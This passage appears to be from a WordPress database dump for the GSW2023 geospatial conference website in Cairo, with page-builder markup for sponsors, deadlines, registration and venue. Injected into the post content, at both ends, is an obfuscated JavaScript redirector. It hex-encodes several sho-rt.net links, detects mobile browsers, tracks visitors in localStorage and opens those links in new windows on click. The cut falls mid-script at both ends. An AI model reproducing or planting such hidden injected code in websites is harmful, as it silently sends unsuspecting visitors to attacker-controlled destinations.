_0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-02 01:34:20','2023-04-02 01:34:20','',3066,'https://gsw2023.com/?p=3990',0,'revision','',0),
(3991,1,'2023-04-02 01:49:19','2023-04-02 01:49:19','<p>[vc_row][vc_column][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400152732{margin-top: 115px !important;}\"]</p>\n<h6><img class=\"aligncenter wp-image-3987 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><img class=\"aligncenter wp-image-3989 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1680400128548{margin-top: 85px !important;}\"]&nbsp;</p>\n<p><img class=\"aligncenter wp-image-3988 \" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 